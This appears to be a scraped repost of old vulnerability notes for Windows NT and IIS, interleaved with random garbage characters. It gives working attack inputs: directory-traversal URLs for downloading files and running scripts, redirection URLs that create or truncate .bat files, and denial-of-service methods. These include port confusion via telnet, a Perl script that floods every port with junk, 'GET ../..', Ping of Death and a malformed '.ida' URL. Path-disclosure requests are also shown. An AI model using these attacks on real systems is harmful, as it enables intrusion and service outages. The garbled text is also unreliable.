受影响系统:4.0,iis 1.0
* M, ?' a/ J% ?. K" i& GA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
3 u9 {# j% m( x% v
+ @4 }0 Q0 D* Z0 I1 ^1 CA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
& ^& r( a/ y1 l" ^7 s5 b" @
- N: J! V! g, h0 {6 ^By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests. i2 x5 J' z% F4 `2 q# ?
5 S: e7 d2 T: Y) I- x9 a* S
--------------------------------------------------------------------
. I1 {. a6 g U
' E# L# G+ m* L受影响系统:4.0
* A: \2 }, x |0 WA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.3 ]0 I+ f6 Q) f, X2 z; J- o
" R5 i! m9 T1 Z, S P4 }If the file 'target.bat' exists, the file will be truncated.
5 Q) i! k" A0 w
# }6 z4 J, k8 U) A; H# W6 `5 H& Y7 y3 z1 [; y
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.4 A6 L# [( e0 k9 {4 w; |
, a: ^ P4 Y3 r----------------------------------------------------------------------; P: n) [% V2 @: n% l" \( `0 R
: V0 T2 n+ Z& {9 ]受影响系统:3.51,4.03 l( ]4 l4 H: z- F; c, E
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.$ Z7 f: r, G0 \. Z6 i
( \& W7 m0 _0 P: z9 cThe following steps;% z4 R5 Z5 o$ h2 Z% e% |2 g
! A& S* J8 {7 [8 F& h6 ITelnet to an NT 4.0 system on port 135
/ t6 `) ^% r5 p! k, N9 f. u @6 xType about 10 characters followed by a <CR> $ ~; O6 X1 r$ N0 B) F8 ?" q
Exit Telnet
" o0 b. `" x; n# U9 y- _results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.; c+ |& [" |2 w6 g8 g7 k
7 P, G- v Q* W7 _6 HWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.% V1 V0 N4 J" t: P7 \2 x; b
" ^3 s* t7 F7 h. J4 ?
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.) v; R1 ]) t% }' M1 |) j) {- w
# ]4 L1 `! n" [! |
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
/ v% r* |1 X, Z% E9 I, ?, M. m, O1 E& O$ m' `- |
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
! e% r% W U3 A, @9 B0 |& }) r+ @' k$ ?
/*begin poke code*/
; r+ I* r) E i n, d1 s+ O; G- ?4 ^& j$ G. Q
use Socket;
1 Y3 x, q8 k1 e- b" } juse FileHandle;
% W- i( J2 j! ~& mrequire "chat2.pl";* J. J2 z8 X) _; P) ^' b
% _! T( D# i. ~; b$systemname = $ARGV[0] && shift;
" e' k0 J4 ]) j) _1 c: D5 M3 O
( O2 u7 J8 o$ S; b- d$verbose = 1; # tell me what you're hitting0 P0 ~; N$ g9 Q& Z/ E" @
$knownports = 1; # don't hit known problem ports$ v L7 u+ ~' W: J+ G3 Q
for ($port = $0; $port<65535; $port++) 8 T6 @2 L. h* U* I# L5 h
{9 O7 k% T" p1 F, f+ U3 z
. ^ i' J) q8 s5 I& c9 V) c( P
% c7 N! M* y% R7 R; Yif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
- M& S6 t) e1 B" Qnext;! `2 R# H/ {# S3 `4 \% l
} B' t3 i [' t N% \4 R: y1 w9 N
$fh = chat::open_port($systemname, $port);
" Q- {& s& U% f0 e# _! R) @4 Gchat::print ($fh,"This is about ten characters or more");, o3 ? G( \# {, r) ^0 O, Q
if ($verbose) {6 k+ v2 A8 ^# q' S3 ?! A* w% ?% U
print "Trying port: $port\n";8 k9 t0 @, G. o5 P; Q! A7 `9 j1 @
} 8 p4 @0 ?& h: Y. W% s! S" a$ ~
chat::close($fh);
+ q9 u7 X- c- @' f& X, h1 ^
1 {! b" ], M7 @; R n}
4 ?/ u' c7 h; L0 N
: L2 N% }. I9 s3 y0 S! c, _" i3 G
# l1 z7 B( \9 S/*end poke code*/
1 B" {. x4 y f/ J; d/ E" E8 E0 v
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername0 o+ R+ {' J% Z2 | [
9 A: D, |1 ?0 u4 N; |( z0 {1 R4 E! Y
--------------------------------------------------------------------------------5 E' a5 b( s: }% x3 Y: A, R8 T
. r% ~. r7 \9 }4 X受影响系统:4.0
1 P/ d% p% `, \/ {0 j0 _8 AUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.- A: [1 j7 E! m7 W% a- B% [8 n
2 n t6 X- @: o+ j! E+ L
This attack causes Dr. Watson to display an alert window and to log an error:
X' s# J! S/ y7 [ ^' u5 N. q. h5 A) Q* V! r8 {9 @
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
8 v9 W+ P7 Q7 I% j
. p" Z( w+ n3 f- a4 l6 b--------------------------------------------------------------------------------; X( j! b; j0 d$ j3 H
' k; a4 s$ s. ^/ w3 B4 u2 Y
受影响系统:3.51,4.0
3 b* P. o" K* _( t. sLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:% S5 B& ]. K& e/ w! U) P
3 ]: j4 C- y, g( `+ H) Q: g% M
STOP: 0X0000001E6 l; c L- i" a
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS" {: w0 C3 H3 J7 _
& P6 ^- t' N) Q. ^8 ^-OR-
' T( D9 K% T( k9 U W6 f# x0 h0 a" y0 D, P; Z# U) h
STOP: 0x0000000A0 q1 y+ n* t7 Y q( x% a! n
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS0 | C8 _2 g6 F. g$ K
4 K9 M. T2 u" M6 `8 SNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
/ a+ D$ {3 P6 ]
+ s: m+ U5 e' J/ z: j( T+ H--------------------------------------------------------------------------------# O V8 p' j3 q& ~
& `" {3 h0 A1 a) K. k. w4 w
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
8 {( h8 @2 r' T; N6 a
3 ~/ j: u; K7 i% w8 R2 x* n--------------------------------------------------------8 J' h' C6 H9 Z7 z2 {$ r
8 _# M- L) e& |% d& A
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |